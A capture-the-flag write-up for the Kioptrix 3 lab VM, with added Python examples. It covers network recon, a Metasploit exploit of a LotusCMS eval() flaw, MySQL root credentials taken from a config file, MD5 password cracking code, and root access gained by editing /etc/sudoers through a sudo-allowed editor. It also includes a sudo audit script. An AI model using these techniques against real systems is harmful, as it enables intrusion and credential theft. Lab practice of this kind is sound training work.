It has been a while since my last write-up. This one is for Kioptrix 3, which you can find here.
Host Discovery
$ nmap -sP 192.168.56.1/24
and we got the IP address: 192.168.56.101. (-sP is the older spelling of -sn: a ping sweep that finds live hosts without port scanning them.)
As explained in the VM's description, you need to add 192.168.56.101 kioptrix3.com to your /etc/hosts, because the web application refers to itself by that hostname.
Fingerprinting
Then, let's find out what services are running on the host.
$ nmap 192.168.56.101 -sV -A
Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-12 20:15 CEST
Nmap scan report for malicious (192.168.56.101)
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.59 seconds
Quite obviously, let's have a look at this web server!
Reconnaissance
Thanks to Nikto, we found some useful information:
(...)
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
(...)
And with DirBuster:
(...)
Dir found: /gallery/ - 500
File found: /gallery/index.php - 500
File found: /gallery/recent.php - 500
Dir found: /gallery/p.php/ - 500
Dir found: /gallery/g.php/ - 500
Dir found: /gallery/themes/ - 200
(...)
Moreover, by browsing the website, I identified the CMS behind it from a meta tag in the page source:
<meta name="keywords" content="LotusCMS" />
Exploitation
With this information, I looked on Exploit-DB for known vulnerabilities.
Bingo, there was one. :-)
I ran Metasploit and exploited this eval() remote command execution.
I got a (limited) meterpreter session on the machine and retrieved several files from the filesystem, such as the gallery's configuration file gconfig.php, which hard-codes the MySQL root credentials:
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
// Setting Details -------------------------------------------------
if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
    echo("A connection to the database couldn't be established: " . mysql_error());
    die();
} else {
    if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
        echo("The Gallarific database couldn't be opened: " . mysql_error());
        die();
    } else {
        $settings = mysql_query("select * from gallarific_settings");
        if(mysql_num_rows($settings) != 0){
            while($data = mysql_fetch_array($settings)){
                $GLOBALS["{$data['settings_name']}"] = $data['settings_value'];
            }
        }
    }
}
?>
Thanks to those credentials (phpMyAdmin authenticates against MySQL itself, so the root password from gconfig.php works there too), I logged into the /phpmyadmin/ that Nikto had spotted and dumped all databases.
Among the rows were two 32-character hashes, i.e. plain unsalted MD5, which cracked to:
dreg:0d3eccfb887aabd50f243b3f155c0f85 => Mast3r
loneferret:5badcaf789d3d1d09794d8f021f40f0e => starwars
Moreover, the dump also gave me the admin's password: n0t7t1k4.
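As an added example (my own code, not part of the original post), here is the check I would run on the dumped rows: since the hashes are 32 hex characters with no salt, one precomputed MD5 table over a candidate list cracks every row in a single pass, which is why the two passwords above fall so quickly. The hash lines are the page's; the five-word candidate list is constructed for the example and stands in for a real wordlist such as rockyou.txt.

```python
import hashlib

# The two credential rows recovered from the gallery database on this page
# (user:md5hex), embedded inline so the example runs offline.
DUMPED_HASHES = """dreg:0d3eccfb887aabd50f243b3f155c0f85
loneferret:5badcaf789d3d1d09794d8f021f40f0e"""

# Constructed candidate list; a real run would read a wordlist file instead.
WORDLIST = ["password", "123456", "starwars", "Mast3r", "letmein"]


def md5hex(word: str) -> str:
    """Unsalted MD5 of the UTF-8 encoded word, as 32 lowercase hex characters."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def looks_like_md5(h: str) -> bool:
    """True for a 32-character lowercase hex string (the shape of an MD5 digest)."""
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h)


def parse_dump(text: str) -> dict:
    """Parse 'user:hash' lines into {user: hash}; blank or malformed lines are skipped."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        creds[user.strip()] = digest.strip().lower()
    return creds


def crack(creds: dict, wordlist) -> dict:
    """Return {user: plaintext} for every hash that matches a candidate word.

    The reverse table is built once, so the cost is len(wordlist) + len(creds)
    hash operations rather than a nested loop; with a per-user salt this shortcut
    would not exist and every user would need their own pass over the wordlist.
    """
    table = {md5hex(w): w for w in wordlist}
    return {u: table[h] for u, h in creds.items()
            if looks_like_md5(h) and h in table}


if __name__ == "__main__":
    creds = parse_dump(DUMPED_HASHES)
    for user, plaintext in crack(creds, WORDLIST).items():
        print(f"{user}:{creds[user]} => {plaintext}")
```

The same table works against any number of dumped rows, which is the practical point: the cost of unsalted MD5 is paid once per candidate, not once per user.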
I then logged into the SSH service with loneferret's credentials.
In the home folder I found a file named CompanyPolicy.README:
$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
And then:
$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
Thanks to this, I only had to open /etc/sudoers with sudo ht (the editor runs as root, so it can write the file) and update the entry to:
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht, /bin/bash
Back to the terminal:
loneferret@Kioptrix3:~$ sudo bash
root@Kioptrix3:~#
and voilà, I was able to read /root/Congrats.txt.
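The sudo -l output was the whole privilege escalation: an interactive editor that runs as root is as good as a root shell, and the !/usr/bin/su entry adds nothing (sudoers(5) itself warns that '!' cannot reliably subtract commands, since a copy of the binary under another name is a different command as far as sudo is concerned). As an added example (my own code, not from the original post), here is a small audit script that parses sudo -l output like the one above and flags both problems. The sample output is constructed from the page's two entries plus one harmless rule so that an unflagged entry is visible too, and the DANGEROUS set is a hand-picked list of binaries, not an exhaustive one.

```python
import re

# Constructed sample: the sudo -l entries shown on this page for loneferret,
# plus one harmless rule (apt-get update) so a non-flagged entry is visible.
SUDO_L_OUTPUT = """User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    (root) /usr/bin/apt-get update"""

# Hand-picked, not exhaustive: binaries that give arbitrary file write or a
# shell once run as root (editors can open /etc/sudoers, pagers and
# interpreters can spawn a shell).
DANGEROUS = {"ht", "vi", "vim", "nano", "less", "more", "find", "awk",
             "python", "perl", "bash", "sh"}

# One sudo -l entry line: "(runas) [TAG: ...] [!]command [args]"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*"       # (root) or (ALL : ALL)
    r"(?P<tags>(?:[A-Z]+:\s*)*)"         # NOPASSWD: SETENV: ...
    r"(?P<neg>!?)(?P<cmd>\S+)(?P<args>.*)$"
)


def parse_sudo_l(text):
    """Turn sudo -l output into a list of entry dicts; header lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        entries.append({
            "runas": m["runas"].strip(),
            "nopasswd": "NOPASSWD" in m["tags"],
            "negated": m["neg"] == "!",
            "cmd": m["cmd"],
            "args": m["args"].strip(),
        })
    return entries


def audit(entries):
    """Return one finding string per entry that hands root to the caller."""
    findings = []
    for e in entries:
        base = e["cmd"].rsplit("/", 1)[-1]
        # "(ALL : ALL)" -> runas user is the part before the colon
        runas_user = e["runas"].split(":")[0].strip()
        if e["negated"]:
            findings.append(
                f"!{e['cmd']}: '!' only subtracts from an earlier grant and is "
                "bypassed by copying the binary; it adds no protection")
        elif runas_user in ("root", "ALL") and base in DANGEROUS:
            auth = "without a password" if e["nopasswd"] else "with the caller's password"
            findings.append(
                f"{e['cmd']} runs as root {auth}: {base} can edit /etc/sudoers "
                "or spawn a root shell")
    return findings


def audit_sudo_l(text):
    """Convenience wrapper: parse sudo -l output, then audit it."""
    return audit(parse_sudo_l(text))


if __name__ == "__main__":
    for finding in audit_sudo_l(SUDO_L_OUTPUT):
        print("FLAG:", finding)
```

Run against the page's entries it flags the negated su rule and the ht rule and leaves apt-get alone; the fix on the defending side is to grant root only to non-interactive commands with fixed arguments, never to an editor, pager or interpreter.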
Nice VM; the ht command was a fun trick.